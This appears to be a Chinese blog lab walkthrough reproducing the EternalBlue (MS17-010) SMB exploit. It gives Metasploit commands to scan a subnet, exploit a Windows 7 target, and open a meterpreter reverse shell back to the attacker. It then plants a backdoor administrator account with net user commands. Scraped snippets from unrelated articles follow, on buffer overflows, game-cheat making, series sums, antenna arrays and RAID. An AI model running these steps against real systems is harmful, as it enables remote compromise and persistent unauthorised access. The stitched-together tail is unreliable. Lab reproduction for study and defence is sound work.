永恒之蓝漏洞复现(Windows server 2008系列缓冲区溢出漏洞)

article/2025/9/17 11:54:54

漏洞信息

漏洞名称:Windows server 2008系列缓冲区溢出漏洞
CVEID:2017-0144
漏洞类型:输入验证错误
威胁类型:远程
发布时间:2017-03-14
危害等级:高危

漏洞简介

Microsoft服务器消息块1.0(SMBv1)服务器处理某些请求的方式中存在一个远程执行代码漏洞。Windows Server 2008 SP2和R2 SP1以及Windows server 2016允许远程攻击者通过精心制作的数据包(也称为“Windows SMB远程代码执行漏洞”)在目标服务器上执行任意代码

漏洞受影响的版本

  • Microsoft Windows XP Sp3 X86
  • Microsoft Windows Vista Service Pack 2
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2008 R2(用于基于x64的系统)SP1
  • Microsoft Windows Server 2008(用于32位系统)SP2
  • Microsoft Windows Server 2003 x64 SP2
  • Microsoft Windows RT 8.1

漏洞攻击原理

Eternalblue通过TCP端口445139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、木马等恶意程序。

实验环境

  • Kali x64(攻击机):192.168.206.131
  • Windows 7(靶机):192.168.206.134
    查看版本
    在这里插入图片描述

开启网络共享(SMB协议)
在这里插入图片描述

关闭防火墙
在这里插入图片描述

测试攻击机与靶机的连通性
在这里插入图片描述
在这里插入图片描述

实验步骤

一、数据库配置
1、查看本机数据库是否开启

service postgresql status

2、打开本机数据库

service postgresql start

3、进行msfdb初始化,配置数据库连接密码等信息

msfdb init

二、进行漏洞扫描
1、启动msf

msfconsole

2、查看数据库状态

db_status

3、搜索ms17_010并使用smb_ms17_010模块进行漏洞扫描

search ms17_010
use auxiliary/scanner/smb/smb_ms17_010

4、设置扫描的主机(或网段)以及扫描线程

set rhosts 192.168.206.133/24
set threads 30

7、执行Run进行扫描

run

三、利用ms17_010漏洞进行攻击
1、使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

2、设置目标主机

set rhost 192.168.206.133

3、设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

4、设置监听主机

set lhost 192.168.206.131

5、执行exploit命令进行攻击

exploit

四、执行后续攻击

sysinfo               //显示远程主机的系统信息
getuid                //查看用户身份
screenshot            //对远程主机当前屏幕进行截图
shell                 //获得shell控制台权限

进行后门植入(植入新的管理员账户)

net user jack 123 /add
net localgroup administrators jack /add
net user
net localgroup administrators

在靶机上查看验证结果

net user
net localgroup administrators

http://chatgpt.dhexx.cn/article/kgG427kp.shtml

相关文章

攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)

堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的。了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例。堆栈 堆 栈是一个在计算机科学中经常使用的抽象数据类型…

缓冲区溢出实例(一)--Windows

一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server…

linux服务器接收缓冲区拥堵,Linux Kernel IP虚拟服务器栈缓冲区溢出漏洞

发布日期&#xff1a;2013-11-15 更新日期&#xff1a;2013-11-18 受影响系统&#xff1a; Linux kernel < 3.2.13 描述&#xff1a; -------------------------------------------------------------------------------- BUGTRAQ ID: 63744 CVE(CAN) ID: CVE-2013-4588 Li…

20155216 缓冲区溢出漏洞实验

20155216 缓冲区溢出漏洞实验 缓冲区溢出漏洞实验实验简介 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制&#xff0c;甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭&#x…

天骄辅助外挂制作,寻求合作

大家好&#xff0c; 进入正题现有我想开发一款游戏外挂&#xff0c;是针对新天娇的 不知您有没有开发外挂的经验呢&#xff1f;由于本人没有外挂开发的经验也暂时找不到相关的资料学习。 现在打算将这个项目外包出去&#xff0c; 要求&#xff1a; 一台机可以同时登录几个帐号 …

解剖一些外挂制作原理(DNF)

外挂现在大体上来讲分为三种&#xff0c;分别是模拟按键&#xff0c;WPE封包和内存挂。比如模拟键盘的&#xff0c;鼠标的&#xff0c;这种就叫做按键模拟&#xff0c;也叫脚本精灵&#xff1b;还有修改数据包的&#xff0c;这种就叫做WPE封包外挂&#xff0c;这种外挂相对而言…

外挂制作之思路总结和基址与偏移量

从今天起开始学习如何做外挂了 &#xff0c; 很久之前了解过一点皮毛。 无非是读写游戏进程中的内存数据。 再读写内存数据之前首先要做的就是找到游戏进程中在内存中的地址。在基地址中&#xff0c;利用CE寻找到某一数据对应的内存地址。计算出偏移量。然后每次都可以通过内存…

高中数学:数列求和的8种常用方法(最全)

高中数学&#xff1a;数列求和的8种常用方法&#xff08;电子版&#xff09;

常用数列求和公式

斐波那契数列 形如数列&#xff1a;1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, ... 如果设F(n&#xff09;为该数列的第n项&#xff08;n∈N*&#xff09;&#xff0c;那么这句话可以写成如下形式: F(n)F(n-1)F(n-2) 通项公式: 求和公式: Sn2AnA(n-1) - 1 A(n2) -1 等…

在线等比数列求和计算器

在线等比数列求和计算器 在线等比数列求和计算器 该等比数列求和计算器可以计算指定等比数列各项之和,该等比数列求和计算器可以计算指定等比数列各项之和 https://tooltt.com/dbsl-sum/

蓝桥杯JAVA数列求和

import java.util.Scanner; public class Main {public static void main(String[] args) {Scanner sc new Scanner(System.in); int n sc.nextInt(); int a 1,b 1,c 1;for (int i 4; i < n; i) {int temp (a b c)%100000;//为了防止超过最大整数&#xff0c;可以…

C语言例程:数列求和

数列求和 计算 1121231234…12…n 的值。通过该实例&#xff0c;可以学习 if 条件判断语句和 for 循环语句的应用。程序运行结果如图 所示。 #include <stdio.h> int main() { int i,j,n; /* 定义循环变量 i,j&#xff0c;数列项数 n */ long int sum0,temp0; /* 定义…

C语言_等比数列求和

等比数列&#xff1a; 图片来源&#xff1a;百度百科 代码实现 1-递推求和 #include<stdio.h> int main() {int n, i;double q, sum, temp;while (scanf("%d %lf", &n, &q) ! EOF)//实现循环{sum 1;temp 1;for (i 0; i < n; i){temp * q;//让临…

Java、对数列求和

package Recursive;public class Exercise18_05 {public static void main(String[] args) {for (int i 1; i < 10; i) //计算m(i)&#xff0c;i 1,2,...10System.out.println("m(" i ") is " m(i));}/** 返回数列和 */public static double m(i…

等差数列求和

文章目录 #任务4.等差数列求和(一&#xff09;编程实现 &#xff08;二&#xff09;讲解知识点&#xff08;三&#xff09;扩展练习任务1.打印水仙花数任务5.打印九九乘法表 #任务4.等差数列求和 -任务&#xff1a;计算123…100的值 (一&#xff09;编程实现 -创建net.lixin…

等比数列求和

引入&#xff1a; 先来看一个问题&#xff0c;求的所有约数之和&#xff1b; 解决思路如下&#xff1a;首先将分解质因数&#xff0c;表示为&#xff0c;其中均为质数&#xff0c;因此表示为&#xff1a;。此时我们将的所有约数表示为集合&#xff0c;从这个约数中选出个数的…

相控阵天线(二):非规则直线阵列天线(稀布阵列、稀疏阵列、平方率分布阵列、含python代码)

目录 非规则线阵概述不均匀递变间距阵列稀布阵列稀疏阵列不均匀相位递变阵列不均匀幅度激励阵列代码示例 非规则线阵概述 非规则线阵主要包括以下情况&#xff1a; 1. 不均匀间距阵列&#xff1a; a&#xff09;不均匀间距递变阵列&#xff1a;单元间距按照一定的系数递增&…

Dell服务器组建阵列-Raid(有阵列卡)

如何使用Dell PowerEdge 14G服务器的系统设置在Dell RAID 控制器(PERC 10)上创建虚拟磁盘 步骤&#xff1a; 在系统启动期间&#xff0c;按F2键进入System Setup&#xff08;系统设置&#xff09;主菜单。 单击Device Settings&#xff08;设备设置&#xff09;。 单击所需的…

磁盘阵列卡

阵列卡的全称叫磁盘阵列卡&#xff08;RAID controller&#xff09;是用来做 RAID&#xff08;廉价冗余磁盘阵列&#xff09;的。磁盘阵列是一种把若干硬磁盘驱动器按照一定要求组成一个整体&#xff0c;整个磁盘阵列由阵列控制器管理的系统。冗余磁盘阵列RAID(Redundant Array…

脉动阵列

脉动阵列是一个比较古老的概念&#xff0c;早在1982年就有了&#xff0c;可是&#xff0c;最近google的TPU采用了这个结构&#xff0c;脉动阵列又火了起来。我也是从今年新入职了一家公司后才接触到的&#xff0c;对比之前自己设计的AI架构&#xff0c;脉动阵列确实有很多优势。…